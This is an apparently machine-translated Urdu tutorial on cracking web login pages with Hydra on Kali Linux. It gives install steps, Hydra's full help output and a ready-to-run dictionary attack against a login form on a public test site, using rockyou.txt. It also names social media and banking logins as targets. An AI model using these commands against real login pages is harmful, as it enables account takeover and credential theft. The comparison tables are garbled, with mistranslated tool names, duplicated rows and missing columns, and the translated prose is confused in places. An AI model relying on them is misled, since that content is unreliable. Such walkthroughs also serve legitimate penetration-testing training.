کالی لینکس میں ہائیڈرا کے ساتھ ویب پر مبنی لاگ ان پیج کو کریک کریں۔

Crack Web Based Login Page With Hydra Kali Linux



پاس ورڈ کو تکنیکی طور پر حروف کی خفیہ تار کے طور پر بیان کیا جاتا ہے جو وسائل تک تصدیق یا رسائی حاصل کرنے کے لیے استعمال ہوتا ہے۔ اسے خفیہ رکھا جانا چاہیے اور دوسروں سے چھپایا جانا چاہیے جنہیں ان وسائل تک رسائی کی اجازت نہیں ہے۔ کمپیوٹر کے ساتھ کمپیوٹر کے ابتدائی دنوں سے پاس ورڈ استعمال ہوتے رہے ہیں۔ پہلی بار شیئرنگ سسٹم میں سے ایک ، 1961 میں متعارف کرایا گیا تھا۔ اس میں ایک لاگ ان کمانڈ تھا جس میں صارف کے پاس ورڈ کی درخواست کی گئی تھی۔ پاس ورڈ ٹائپ کرنے کے بعد ، نظام اگر ممکن ہو تو پرنٹنگ کا طریقہ کار بند کردیتا ہے ، تاکہ صارف رازداری کے ساتھ اپنا پاس ورڈ ٹائپ کر سکے۔

پاس ورڈ کی طاقت لمبائی ، پیچیدگی اور غیر متوقع صلاحیت کا کام ہے۔ یہ اندازہ لگانے یا اسے توڑنے کے خلاف مزاحمت میں تاثیر کی پیمائش کرتا ہے۔ کمزور پاس ورڈ ، دوسری طرف اندازہ لگانے اور ذاتی/کارپوریٹ ای میلز تک رسائی حاصل کرنے کے لیے ضروری وقت کم کرتے ہیں ، حساس معلومات جیسے مالی معلومات ، کاروباری معلومات ، کریڈٹ کارڈ وغیرہ۔







بہت سے طریقے ہیں جن سے پاس ورڈ کمزور ہو سکتا ہے جو مختلف حملے کی اسکیموں کی طاقت کے مطابق ہے۔ اس قسم کے اسنادی حملے میں سب سے زیادہ مقبول ، وحشی قوت ہے۔ یہ ایک آزمائش اور غلطی کا طریقہ ہے جیسے اندازہ لگانا ، خفیہ کردہ ڈیٹا کو ڈی کوڈ کرنے کی کوشش جیسے پاس ورڈ یا ڈیٹا انکرپشن جو ایپلی کیشن پروگرام یا ہیکنگ ٹول کے ذریعہ استعمال ہوتا ہے۔



ہائیڈرا تیز ترین نیٹ ورک لاگون کریکر ہے جو متعدد اٹیک پروٹوکول کی حمایت کرتا ہے۔ یہ بہت تیز اور لچکدار ہے ، اور نئے ماڈیول شامل کرنا آسان ہیں۔ یہ ٹول محققین اور سیکورٹی کنسلٹنٹس کے لیے یہ دکھانا ممکن بناتا ہے کہ دور دراز تک سسٹم تک غیر مجاز رسائی حاصل کرنا کتنا آسان ہوگا۔ ہائیڈرا وین ہوسر نے لکھا تھا اور اس کے علاوہ ڈیوڈ میکیجک نے بھی اس کی حمایت کی تھی۔ تازہ ترین اپ ڈیٹ میں ہائیڈرا ڈویلپمنٹ کو پبلک گیتھب ریپوزٹری میں منتقل کر دیا گیا ہے: https://github.com/vanhauser-thc/thc-hydra۔



ہائیڈرا کو لینکس ، ونڈوز/سائگ ون ، سولاریس 11 ، فری بی ایس ڈی 8.1 ، اوپن بی ایس ڈی ، او ایس ایکس ، کیو این ایکس/بلیک بیری پر مرتب کرنے کا تجربہ کیا گیا تھا ، اور اسے جی پی ایل وی 3 کے تحت خصوصی اوپن ایس ایل لائسنس کی توسیع کے ساتھ دستیاب کیا گیا ہے۔





ٹی ایچ سی ہائیڈرا ان پروٹوکولز کی حمایت کرتی ہے: سسکو اے اے اے ، سسکو مستند ، سسکو اینبل ، سی وی ایس ، ایف ٹی پی ، ایچ ٹی ٹی پی (ایس) -فارم-گیٹ ، ایچ ٹی ٹی پی (ایس) -فارم-پوسٹ ، ایچ ٹی ٹی پی (ایس) -جیٹ ، ایچ ٹی ٹی پی (ہیڈ) ، HTTP- پراکسی ، ICQ ، IMAP ، IRC ، LDAP ، MS-SQL ، MySQL ، NNTP ، اوریکل سننے والا ، اوریکل SID ، PC-Anywhere ، PC-NFS ، POP3 ، PostgreSQL ، RDP ، Rexec ، Rlogin ، Rsh ، SIP ، SMB (NT) ، SMTP ، SMTP Enum ، SNMP v1+v2+v3 ، SOCKS5 ، SSH (v1 اور v2) ، SSHKEY ، تخریب کاری ، ٹیم اسپیک (TS2) ، ٹیل نیٹ ، VMware-Auth ، VNC اور XMPP۔

دیگر کریکنگ ٹولز کے ساتھ ہائیڈرا کا موازنہ کرنا۔

ہائڈرا کے ساتھ بہت سارے لاگ ان کریکر ٹولز بھی ہیں ، تاہم کوئی بھی پروٹوکول کی ایک بہت بڑی فہرست کی حمایت نہیں کرتا ہے اور ہائیڈرا کی طرح متوازی لاگ ان کریکر سپورٹ کی حمایت نہیں کرتا ہے۔ مندرجہ ذیل میزیں خصوصیات ، خدمات اور میڈوسا اور این کریک کے مقابلے میں رفتار کے مقابلے کا نتیجہ دکھاتی ہیں۔



خصوصیات

خصوصیت ہائیڈرا جیلی فش این کریک
لائسنس AGPLv3۔ جی پی ایل وی 2۔ GPLv2 + Nmap شرائط۔
IPv6 سپورٹ جی ہاں نہیں نہیں
گرافک یوزر انٹرفیس۔ جی ہاں جی ہاں نہیں
انٹرنیشنلائزڈ سپورٹ (RFC 4013) جی ہاں نہیں نہیں
HTTP پراکسی سپورٹ۔ جی ہاں جی ہاں نہیں
ساکس پراکسی سپورٹ۔ جی ہاں نہیں نہیں
تعاون یافتہ پروٹوکول۔ 51۔ 22۔

خدمات۔

کریک ویب بیسڈ لاگ ان پیج کے ساتھ۔

خدمت۔ تفصیلات ہائیڈرا جیلی فش این کریک
ADAM-6500 جی ہاں نہیں نہیں
اے ایف پی جی ہاں جی ہاں نہیں
نجمہ جی ہاں نہیں نہیں
سسکو پاس ورڈ جی ہاں نہیں نہیں
سسکو فعال کریں جی ہاں نہیں نہیں
CVS جی ہاں جی ہاں نہیں
فائر برڈ۔ جی ہاں نہیں نہیں
ایف ٹی پی جی ہاں جی ہاں جی ہاں
SSL سپورٹ AUTH TLS اور FTP SSL پر۔ AUTH TLS اور FTP SSL پر۔ نہیں
HTTP طریقہ کار گیٹ ، ہیڈ ، پوسٹ۔ حاصل کریں حاصل کریں
بنیادی تصنیف۔ جی ہاں جی ہاں جی ہاں
HTTP فارم طریقہ کار حاصل کریں ، پوسٹ کریں۔ حاصل کریں ، پوسٹ کریں۔ نہیں
SSL سپورٹ HTTPS HTTPS نہیں
HTTP پراکسی۔ بنیادی تصنیف۔ جی ہاں نہیں نہیں
DIGEST-MD5 Auth جی ہاں نہیں نہیں
این ٹی ایل ایم اتھ۔ جی ہاں نہیں نہیں
SSL سپورٹ HTTPS نہیں نہیں
HTTP پراکسی یو آر ایل گنتی۔ جی ہاں نہیں نہیں
آئی سی کیو v5 جی ہاں
نہیں نہیں
IMAP لاگ ان سپورٹ۔ جی ہاں جی ہاں نہیں
AUTH لاگ ان سپورٹ۔ جی ہاں نہیں نہیں
AUTH PLAIN سپورٹ۔ جی ہاں جی ہاں نہیں
AUTH CRAM-MD5 سپورٹ۔ جی ہاں نہیں نہیں
AUTH CRAM-SHA1 سپورٹ۔ جی ہاں نہیں نہیں
AUTH CRAM-SHA256 سپورٹ۔ جی ہاں نہیں نہیں
AUTH DIGEST-MD5 سپورٹ۔ جی ہاں نہیں نہیں
AUTH NTLM سپورٹ جی ہاں جی ہاں نہیں
AUTH SCRAM-SHA1 سپورٹ۔ جی ہاں نہیں نہیں
SSL سپورٹ IMAPS اور STARTTLS۔ IMAPS اور STARTTLS۔ نہیں
آئی آر سی عام سرور پاس ورڈ جی ہاں نہیں نہیں
OPER موڈ پاس ورڈ جی ہاں نہیں نہیں
ایل ڈی اے پی۔ v2 ، سادہ سپورٹ۔ جی ہاں نہیں نہیں
v3 ، سادہ سپورٹ۔ جی ہاں نہیں نہیں
v3 ، AUTH CRAM-MD5 سپورٹ۔ جی ہاں نہیں نہیں
AUTH DIGEST-MD5 سپورٹ۔ جی ہاں
AUTH NTLM سپورٹ جی ہاں جی ہاں
AUTH SCRAM-SHA1 سپورٹ۔ جی ہاں
SSL سپورٹ IMAPS اور STARTTLS۔ IMAPS اور STARTTLS۔
آئی آر سی عام سرور پاس ورڈ جی ہاں
OPER موڈ پاس ورڈ جی ہاں
ایل ڈی اے پی۔ v2 ، سادہ سپورٹ۔ جی ہاں
v3 ، سادہ سپورٹ۔ جی ہاں
v3 ، AUTH CRAM-MD5 سپورٹ۔ جی ہاں
v3 ، AUTH DIGEST-MD5 سپورٹ۔ جی ہاں
MS-SQL جی ہاں جی ہاں
ایس کیو ایل۔ v3.x جی ہاں جی ہاں
v4.x جی ہاں جی ہاں
v5.x جی ہاں جی ہاں
این سی پی جی ہاں جی ہاں
این این ٹی پی۔ USER سپورٹ۔ جی ہاں جی ہاں
AUTH لاگ ان سپورٹ۔ جی ہاں
AUTH PLAIN سپورٹ۔ جی ہاں
AUTH CRAM-MD5 سپورٹ۔ جی ہاں
AUTH DIGEST-MD5 سپورٹ۔ جی ہاں
AUTH NTLM سپورٹ جی ہاں
SSL سپورٹ SSL پر STARTTLS اور NNTP۔
اوریکل ڈیٹا بیس۔ جی ہاں جی ہاں
ٹی این ایس سننے والا۔ جی ہاں
ایس آئی ڈی گنتی جی ہاں
PC-NFS جی ہاں
پی سی کہیں بھی مقامی تصدیق۔ جی ہاں جی ہاں
OS پر مبنی توثیق (MS) جی ہاں
پی او پی 3۔ USER سپورٹ۔ جی ہاں جی ہاں جی ہاں
APOP سپورٹ جی ہاں
AUTH لاگ ان سپورٹ۔ جی ہاں جی ہاں
AUTH PLAIN سپورٹ۔ جی ہاں جی ہاں
AUTH CRAM-MD5 سپورٹ۔ جی ہاں
AUTH CRAM-SHA1 سپورٹ۔ جی ہاں
AUTH CRAM-SHA256 سپورٹ۔ جی ہاں
AUTH DIGEST-MD5 سپورٹ۔ جی ہاں
AUTH NTLM سپورٹ جی ہاں جی ہاں
SSL سپورٹ POP3S اور STARTTLS۔ POP3S اور STARTTLS۔ POP3S
پوسٹ گری ایس کیو ایل۔ جی ہاں جی ہاں
نجمہ جی ہاں
آر ڈی پی ونڈوز ورک سٹیشن۔ جی ہاں جی ہاں جی ہاں
ونڈوز سرور۔ جی ہاں جی ہاں
ڈومین اتھ۔ جی ہاں جی ہاں
ریڈیس جی ہاں نہیں
ریکیکس جی ہاں جی ہاں
لاگ ان جی ہاں جی ہاں
آر پی سی اے پی۔ جی ہاں نہیں
RSH جی ہاں جی ہاں
آر ٹی ایس پی۔ جی ہاں نہیں
SAP R / 3۔ جی ہاں
سیمنز S7-300۔ جی ہاں
گھونٹ جی ہاں
SSL سپورٹ ایس ایس ایل پر گھونٹیں۔
ایس ایم بی NetBIOS موڈ جی ہاں جی ہاں نہیں
W2K آبائی موڈ۔ جی ہاں جی ہاں جی ہاں
ہیش موڈ جی ہاں جی ہاں نہیں
متن کی تصحیح صاف کریں۔ جی ہاں جی ہاں
LMv1 Auth جی ہاں جی ہاں جی ہاں
LMv2 اتھ۔ جی ہاں جی ہاں جی ہاں
NTLMv1 اتھ۔ جی ہاں جی ہاں جی ہاں
NTLMv2 اتھ۔ جی ہاں جی ہاں جی ہاں
SMTP AUTH لاگ ان سپورٹ۔ جی ہاں جی ہاں
AUTH PLAIN سپورٹ۔ جی ہاں جی ہاں
AUTH CRAM-MD5 سپورٹ۔ جی ہاں
AUTH DIGEST-MD5 سپورٹ۔ جی ہاں
AUTH NTLM سپورٹ جی ہاں جی ہاں
SSL سپورٹ SMTPS اور STARTTLS۔ SMTPS اور STARTTLS۔
ایس ایم ٹی پی یوزر اینوم۔ VRFY cmd جی ہاں جی ہاں
EXPN cmd جی ہاں جی ہاں
RCPT تا cmd جی ہاں جی ہاں
ایس این ایم پی۔ v1 جی ہاں جی ہاں
v2c جی ہاں جی ہاں
v3 (صرف MD5/SHA1 تصنیف)
موزے v5 ، پاس ورڈ اتھ۔ جی ہاں
ایس ایس ایچ v1 جی ہاں
v2 جی ہاں جی ہاں جی ہاں
ایس ایس ایچ کیز۔ v1 ، v2۔ جی ہاں
تخریب کاری (SVN) جی ہاں جی ہاں
ٹیم سے بات ٹی ایس 2۔ جی ہاں
ٹیل نیٹ جی ہاں جی ہاں جی ہاں
ایکس ایم پی پی۔ AUTH لاگ ان سپورٹ۔ جی ہاں
AUTH PLAIN سپورٹ۔ جی ہاں
AUTH CRAM-MD5 سپورٹ۔ جی ہاں
AUTH DIGEST-MD5 سپورٹ۔ جی ہاں
AUTH SCRAM-SHA1 سپورٹ۔ جی ہاں
وی ایم ویئر آتھ ڈیمون۔ v1.00 / v1.10۔ جی ہاں جی ہاں
SSL سپورٹ جی ہاں جی ہاں
وی این سی RFB 3.x پاس ورڈ سپورٹ جی ہاں جی ہاں
RFB 3.x یوزر+پاس ورڈ سپورٹ۔ (صرف الٹرا وی این سی)
RFB 4.x پاس ورڈ سپورٹ جی ہاں جی ہاں
RFB 4.x یوزر+پاس ورڈ سپورٹ۔ (صرف الٹرا وی این سی)

رفتار کا موازنہ۔

رفتار (میں) ہائیڈرا جیلی فش این کریک
1 ٹاسک / ایف ٹی پی ماڈیول 11.93۔ 12.97۔ 18.01۔
4 ٹاسک / ایف ٹی پی ماڈیول 4.20۔ 5.24۔ 9.01۔
16 ٹاسک / ایف ٹی پی ماڈیول 2.44۔ 2.71۔ 12.01۔
1 ٹاسک / SSH v2 ماڈیول 32.56۔ 33.84۔ 45.02۔
4 کام / SSH v2 ماڈیول۔ 10.95۔ ٹوٹاھوا چھوٹ گیا۔
16 کام / SSH v2 ماڈیول۔ 5.14۔ ٹوٹاھوا چھوٹ گیا۔

یہ ہائیڈرا کا مختصر سا تعارف تھا۔ اب انسٹالیشن کی طرف چلتے ہیں۔

ہائیڈرا انسٹال کرنا۔

ہائیڈرا کالی لینکس پر پہلے سے انسٹال ہے ، تاہم اگر آپ کے پاس مختلف آپریٹنگ سسٹم ہے تو آپ اسے اپنے سسٹم پر مرتب اور انسٹال کرسکتے ہیں۔ فی الحال ، مختلف پلیٹ فارمز پر ہائیڈرا کی معاونت:

  • تمام UNIX پلیٹ فارم (لینکس ، *بی ایس ڈی ، سولاریس ، وغیرہ)
  • MacOS (بنیادی طور پر ایک BSD کلون)
  • سائگ ون کے ساتھ ونڈوز (دونوں IPv4 اور IPv6)
  • لینکس ، میک او ایس یا کیو این ایکس پر مبنی موبائل سسٹم (جیسے اینڈرائیڈ ، آئی فون ، بلیک بیری 10 ، زورس ، آئی پی اے کی)

ہائیڈرا کو ڈاؤن لوڈ ، کنفیگر ، مرتب اور انسٹال کرنے کے لیے ، صرف ٹرمینل میں ٹائپ کریں:

git clone https://github.com/vanhauser-thc/thc-hydra.git cd thc-hydra ./configure make make install 

اگر آپ کے پاس اوبنٹو/ڈیبین ہے تو آپ کو کچھ انحصاری لائبریریوں کی ضرورت ہوگی۔

apt install libssl-dev libssh-dev libidn11-dev libpcre3-dev libgtk2.0-dev libmysqlclient-dev libpq-dev libsvn-dev firebird-dev libncp-dev 

اگر آپ ان لائبریریوں کو اپنے ذخیرے میں نہیں ڈھونڈ سکتے ہیں ، تو آپ کو انہیں دستی طور پر ڈاؤن لوڈ اور انسٹال کرنے کی ضرورت ہے۔

ہائیڈرا کا استعمال کیسے کریں

مبارک ہو ، اب آپ اپنے سسٹم پر ہائیڈرا انسٹال کرنے میں کامیاب ہو گئے ہیں۔ دراصل ، ہائیڈرا دو ذائقوں ، GUI-gtk اور میرا پسندیدہ ، CLI ورژن کے ساتھ آتا ہے۔ اور اس کے علاوہ ہائیڈرا کا CLI گائیڈڈ ورژن بھی ہے ، جسے ہائیڈرا وزرڈ کہا جاتا ہے۔ ٹرمینل میں دستی طور پر تمام احکامات یا دلائل ٹائپ کرنے کے بجائے آپ کو قدم بہ قدم رہنمائی ملے گی۔ ہائیڈرا چلانے کے لیے ، اپنے ٹرمینل ٹائپ سے:

CLI کے لیے:

hydra

CLI وزرڈ کے لیے:

hydra-wizard

GUI کے لیے:

xhydra

آپ کے 'ہائیڈرا' ٹائپ کرنے کے بعد یہ اس طرح کی مدد کے احکامات دکھائے گا:

 [email protected] :~# hydra -h Hydra v8.6 (c)2017 by van Hauser/THC & David Maciejak - for legal purposes only Syntax: hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e nsr] [-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-W TIME] [-f] [-s PORT] [-x MIN:MAX:CHARSET] [-SuvV46] [service://server[:PORT][/OPT]] Options: -R restore a previous aborted/crashed session -S perform an SSL connect -s PORT if the service is on a different default port, define it here -l LOGIN or -L FILE login with LOGIN name, or load several logins from FILE -p PASS or -P FILE try password PASS, or load several passwords from FILE -x MIN:MAX:CHARSET password bruteforce generation, type '-x -h' to get help -e nsr try 'n' null password, 's' login as pass and/or 'r' reversed login -u loop around users, not passwords (effective! implied with -x) -C FILE colon separated 'login:pass' format, instead of -L/-P options -M FILE list of servers to be attacked in parallel, one entry per line -o FILE write found login/password pairs to FILE instead of stdout -f / -F exit when a login/pass pair is found (-M: -f per host, -F global) -t TASKS run TASKS number of connects in parallel (per host, default: 16) -w / -W TIME waittime for responses (32s) / between connects per thread -4 / -6 prefer IPv4 (default) or IPv6 addresses -v / -V / -d verbose mode / show login+pass for each attempt / debug mode -U service module usage details server the target server (use either this OR the -M option) service the service to crack (see below for supported protocols) OPT some service modules support additional input (-U for module help) Supported services: asterisk afp cisco cisco-enable cvs firebird ftp ftps http[s]-head http[s]-post-form http-proxy http-proxy-urlenum icq imap[s] irc ldap2[s] ldap3[-crammd5][s] mssql mysql ncp nntp oracle-listener oracle-sid pcanywhere pcnfs pop3[s] postgres rdp rexec rlogin rsh s7-300 sip smb smtp[s] smtp-enum snmp socks5 ssh sshkey svn teamspeak telnet[s] vmauthd vnc xmpp Hydra is a tool to guess/crack valid login/password pairs - usage only allowed for legal purposes. This tool is licensed under AGPL v3.0. The newest version is always available at http://www.thc.org/thc-hydra These services were not compiled in: sapr3 oracle. Use HYDRA_PROXY_HTTP or HYDRA_PROXY - and if needed HYDRA_PROXY_AUTH - environment for a proxy setup. E.g.: % export HYDRA_PROXY=socks5://127.0.0.1:9150 (or socks4:// or connect://) % export HYDRA_PROXY_HTTP=http://proxy:8080 % export HYDRA_PROXY_AUTH=user:pass Examples: hydra -l user -P passlist.txt ftp://192.168.0.1 hydra -L userlist.txt -p defaultpw imap://192.168.0.1/PLAIN hydra -C defaults.txt -6 pop3s://[fe80::2c:31ff:fe12:ac11]:143/TLS:DIGEST-MD5 hydra -l admin -p password ftp://[192.168.0.0/24]/ hydra -L logins.txt -P pws.txt -M targets.txt ssh

ہائیڈرا کے ساتھ بروٹ فورس ویب پر مبنی لاگ ان۔

ہائیڈرا کچھ بروٹ فورسنگ سروس کو سپورٹ کرتی ہے جیسا کہ میں نے پہلے ذکر کیا ہے ، ان میں سے ایک ویب پر مبنی لاگ ان جیسے سوشل میڈیا لاگ ان فارم ، یوزر بینکنگ لاگ ان فارم ، آپ کے روٹر ویب بیسڈ لاگ ان وغیرہ کو بروٹ فورس کرنے کے لیے استعمال کیا جاتا ہے جو کہ http [s] -get-form جو اس درخواست کو سنبھالے گا۔ اس ٹیوٹوریل میں میں آپ کو دکھانے جا رہا ہوں کہ کس طرح کمزور ویب لاگ انز کو مضبوط بنایا جائے۔ اس سے پہلے کہ ہم ہائیڈرا کو آگ لگائیں ہمیں کچھ ضروری دلائل جاننے چاہئیں جیسے کہ:

  • ہدف۔ : http://testasp.vulnweb.com/Login.asp؟RetURL=٪2FDefault٪2Easp٪3F
  • صارف نام لاگ ان کریں۔ : منتظم (اگر آپ کو یقین نہیں ہے تو ، اس کو مضبوط کریں)
  • پاس ورڈ کی فہرست۔ : ممکنہ پاس ورڈز پر مشتمل لغت فائل کی فہرست کا مقام۔
  • فارم کے پیرامیٹرز : عام طور پر ، درخواست کے پیرامیٹرز کی شکل حاصل کرنے کے لیے چھیڑ چھاڑ کا ڈیٹا یا پراکسی استعمال کریں۔ لیکن یہاں میں آئس ویزل ، فائر فاکس بیسڈ ، نیٹ ورک ڈویلپر ٹول بار استعمال کر رہا ہوں۔
  • سروس ماڈیول : http-post-form
Help for module http-post-form: ============================================================================ Module http-post-form requires the page and the parameters for the web form. By default this module is configured to follow a maximum of 5 redirections in a row. It always gathers a new cookie from the same URL without variables The parameters take three ':' separated values, plus optional values. (Note: if you need a colon in the option string as value, escape it with ':', but do not escape a '' with '\'.) Syntax: [url]:[form parameters]:[condition string][:(optional)[:(optional)] First is the page on the server to GET or POST to (URL). Second is the POST/GET variables (taken from either the browser, proxy, etc. with usernames and passwords being replaced in the '^USER^' and '^PASS^' placeholders (FORM PARAMETERS) Third is the string that it checks for an *invalid* login (by default) Invalid condition login check can be preceded by 'F=', successful condition login check must be preceded by 'S='. This is where most people get it wrong. You have to check the webapp what a failed string looks like and put it in this parameter! The following parameters are optional: C=/page/uri to define a different page to gather initial cookies from (h|H)=My-Hdr: foo to send a user defined HTTP header with each request ^USER^ and ^PASS^ can also be put into these headers! Note: 'h' will add the user-defined header at the end regardless it's already being sent by Hydra or not. 'H' will replace the value of that header if it exists, by the one supplied by the user, or add the header at the end Note that if you are going to put colons (:) in your headers you should escape them with a backslash (). All colons that are not option separators should be escaped (see the examples above and below). You can specify a header without escaping the colons, but that way you will not be able to put colons in the header value itself, as they will be interpreted by hydra as option separators.

براؤزر ، آئس ویزل/فائر فاکس کا استعمال کرتے ہوئے پوسٹ پیرامیٹرز حاصل کرنا۔

اپنے فائر فاکس براؤزر میں چابیاں دبائیں ‘ CTRL + SHIFT + Q '. پھر ویب لاگ ان پیج کھولیں۔http://testasp.vulnweb.com/Login.asp؟RetURL=٪2FDefault٪2Easp٪3F، آپ دیکھیں گے کہ کچھ متن نیٹ ورک ڈویلپر ٹیب پر ظاہر ہوتا ہے۔ یہ آپ کو بتاتا ہے کہ ہمیں کون سی فائلیں منتقل کی جاتی ہیں۔ طریقہ دیکھیں کہ سب GET ہیں ، چونکہ ہمارے پاس ابھی تک کوئی ڈیٹا پوسٹ نہیں ہوا ہے۔

فارم کے بعد کے پیرامیٹرز کو حاصل کرنے کے لیے ، صارف نام اور یا پاس ورڈ فارم میں جو بھی ٹائپ کریں۔ آپ نیٹ ورک ڈویلپر ٹیب پر ایک نیا POST طریقہ دیکھیں گے۔ اس لائن پر ڈبل کلک کریں ، ہیڈر ٹیب پر دائیں جانب ترمیم اور دوبارہ بھیجیں بٹن پر کلک کریں۔ ریکویسٹ باڈی پر آخری لائن کاپی کریں ، جیسے۔ tfUName = asu & tfUPass = raimu . کی tfUName اور tfUPass وہ پیرامیٹرز ہیں جن کی ہمیں ضرورت ہے۔ جیسا کہ نیچے دیکھا گیا ہے:

کالی لینکس میں الفاظ کی فہرست ہے ، مناسب ورڈ لسٹ کا انتخاب کریں یا صرف rockyou.txt جگہ استعمال کریں /usr/share/wordlists/ جیسا کہ نیچے دیکھا گیا ہے:

ٹھیک ہے ، اب ہمیں وہ تمام دلائل مل گئے ہیں جن کی ہمیں ضرورت ہے اور ہائیڈرا کو آگ لگانے کے لیے تیار ہیں۔ یہاں کمانڈ پیٹرن ہے:

hydra -l -P [/code] Finally, based on information we have gathered, our commands ahould look something like this: hydra -l admin -P /usr/share/wordlists/rockyou.txt testasp.vulnweb.com http-post-form '/Login.asp?RetURL=%2FDefault%2Easp%3F:tfUName=^USER^&tfUPass=^PASS^:S=logout' -vV -f

آئیے احکامات کو توڑ دیں:

  • کی : ایک ایسا لفظ ہے جس میں یوزر نیم اکاؤنٹ ہے ، فائل میں ممکنہ صارف نام کی فہرست کے لیے -L استعمال کریں۔
  • پی۔ : ممکنہ پاس ورڈ کی فائل لسٹ ہے ، استعمال کریں -p لفظی طور پر اندازہ لگانے کے بجائے ایک لفظ کا پاس ورڈ استعمال کریں۔
  • testapp.vunlwebapp.com۔ : ایک میزبان نام یا ہدف ہے۔
  • http- پوسٹ فارم : سروس ماڈیول ہے جو ہم استعمال کرتے ہیں۔
  • /Login.asp؟RetURL=٪2FDefault٪2Easp٪3F:tfUName=^USER^&tfUPass=^PASS^:S=logout = 3 پیرامیٹرز کی ضرورت ہے ، نحو یہ ہے:
    {page URL}: {Request post body form paramit}: S = {کامیابی سے لاگ ان ہونے کے بعد صفحے میں جو کچھ بھی ہے تلاش کریں}
  • v = لفظی وضع۔
  • وی۔ = لاگ ان دکھائیں: ہر کوشش کے لیے پاس کریں۔
  • f = پروگرام بند کریں اگر جوڑا لاگ ان ہو: پاس ورڈ مل گیا۔

اب چلو ہائیڈرا کو ہمارے لیے پاس ورڈ توڑنے کی کوشش کرتے ہیں ، اسے وقت درکار ہے کیونکہ یہ لغت پر حملہ ہے۔ ایک بار جب آپ لاگ ان کا ایک جوڑا ڈھونڈنے میں کامیاب ہو گئے: پاس ورڈ ہائیڈرا فوری طور پر کام ختم کر دے گا اور درست اسناد دکھائے گا۔

بہت کچھ ہے جو کہ ہائیڈرا کر سکتا ہے ، چونکہ اس ٹیوٹوریل میں ہم نے صرف ہائیڈرا کا استعمال کرتے ہوئے ویب پر مبنی لاگون کو بروٹ فورس کرنا سیکھا ہے ، ہم صرف ایک پروٹوکول سیکھتے ہیں ، وہ ہے http- پوسٹ فارم پروٹوکول۔ ہم ہائیڈرا کو دوسرے پروٹوکول جیسے ssh ، ftp ، telnet ، VNC ، proxy وغیرہ کے خلاف بھی استعمال کر سکتے ہیں۔